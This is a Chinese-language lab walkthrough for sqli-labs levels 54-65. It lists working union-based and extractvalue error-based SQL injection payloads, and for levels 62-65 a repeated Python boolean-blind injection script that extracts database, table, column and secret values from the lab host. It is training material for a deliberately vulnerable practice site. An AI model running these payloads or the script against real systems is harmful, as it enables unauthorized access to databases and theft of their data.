sqli.labs靶场(54-65关)

54、第五十四关

提示尝试是十次后数据库就重置,那我们尝试union

原来是单引号闭合

id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

数据库:challenges,表名是:4c7k78qe8t,就一个表

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4c7k78qe8t')--+

字段为:id,sessid,secret_MWHJ,tryy

id=-1' union select 1,2,(select secret_MWHJ from 4c7k78qe8t)--+

查出Secret Key:KojCXmD2nIqg6AyFzp5Vi1jq

将获取的key值放到下面输入框点击提交就完成所有步骤。

55、第五十五关

这关也可以尝试10次,后表名,字段名,数据随机改变

id=-1' union select 1,2,database()--+

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges')--+

id=-1' union select 1,2,(select group_concat(secret_YV1N) from qthriw02yn)--+

secret_YV1N:f11TD89MthkTPZnwzxOHg4OX

56、第五十六关

这关可以尝试14次后才重置表数据

id=-1') union select 1,2,3--+尝试出单引号加括号闭合

id=-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wcqh1ndqln')--+

id=-1') union select 1,2,(select secret_TCFR from wcqh1ndqln)--+

secret key:cityELb2pMtzbUtJLNTMGnHj

57、第五十七关

尝试出双引号闭合

id=-1" union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

id=-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='dtxwciipgl')--+

然后查出secret key:qZFAb0BLbaFXnzxh6kjKOYkK

id=-1" union select 1,2,(select group_concat(secret_KB70) from dtxwciipgl)--+

58、第五十八关

这关只能试五次

有报错,可以尝试报错注入

id=-1' and extractvalue(1,concat(0x7e,database()))--+

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4l6g2539j4')))--+

id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_0FM9) from 4l6g2539j4)))--+

secret key:cHu2PRJ1aEZ7uZ8OVcFx1x80

59、第五十九关

根据经验尝试双引号,结果不对,是数值型

id=1 and extractvalue(1,concat(0x7e,database()))--+

id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='egnu8zwkpl')))--+

接下来根据egnu8zwkpl表查secret_6QHK:9DwDyopuZPFpopuiXwgBLtmA然后提交即可

60、第六十关

?id=1"根据报错看出后面还有个括号,应该是双引号加括号闭合

id=1") and extractvalue(1,concat(0x7e,database()))--+

id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uz68fmjku1')))--+

secret key:PwGGU5F3ssSpFEMqDUGeNxL6

61、第六十一关

有报错,感觉是双引号加双括号闭合,还是报错注入尝试

id=1')) and extractvalue(1,concat(0x7e,database()))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='7cqx2e789u')))--+

id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_VHAS) from o8qdqu14j4)))--+

62、第六十二关

这关没有报错信息,无法用报错注入

id=1')--+尝试出是单引号加括号注入

看来得用盲注,上脚本

python 复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-62/?id=1') "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secret key:xhsby2cnal7av3nvaumrzhzf

63、第六十三关

单引号闭合,没有报错信息,还是盲注

还是用脚本方便

python 复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-63/?id=1' "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secrect key:yz4ukedoyymuczebysso01ny

提交secret key

64、第六十四关

经过多次尝试是两个括号闭合,没有报错信息,还是盲注;上脚本

python 复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-64/?id=1)) "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secrect key:hrpd70rpt9uwatrucfsrz23v

提交secret key

65、第六十五关

经测试发现是双引号加括号闭合,没有报错信息,还是考盲注,方便的脚本继续跑

python 复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-65/?id=1%22) "
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')--+"
            res = requests.get(url_db)
            if "Angelina" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='{tables}')),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)={a})--+"
            else:
                url_db = url + f"and(substr((selEcT(group_concat({zd}))from({tables})),{p},1)='{a}')--+"
            num += 1
            res = requests.get(url_db)
            if "Angelina" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

跑出secrect key:nneodmdybdsnggrqwmfwlxe7

提交secret key

相关推荐
瓜牛_gn43 分钟前
mysql特性
数据库·mysql
奶糖趣多多2 小时前
Redis知识点
数据库·redis·缓存
数新网络3 小时前
《深入浅出Apache Spark》系列②:Spark SQL原理精髓全解析
大数据·sql·spark
CoderIsArt3 小时前
Redis的三种模式:主从模式,哨兵与集群模式
数据库·redis·缓存
师太,答应老衲吧5 小时前
SQL实战训练之,力扣:2020. 无流量的帐户数(递归)
数据库·sql·leetcode
Yaml46 小时前
Spring Boot 与 Vue 共筑二手书籍交易卓越平台
java·spring boot·后端·mysql·spring·vue·二手书籍
Channing Lewis6 小时前
salesforce case可以新建一个roll up 字段,统计出这个case下的email数量吗
数据库·salesforce
追风林6 小时前
mac 本地docker-mysql主从复制部署
mysql·macos·docker
毕业设计制作和分享7 小时前
ssm《数据库系统原理》课程平台的设计与实现+vue
前端·数据库·vue.js·oracle·mybatis
ketil277 小时前
Redis - String 字符串
数据库·redis·缓存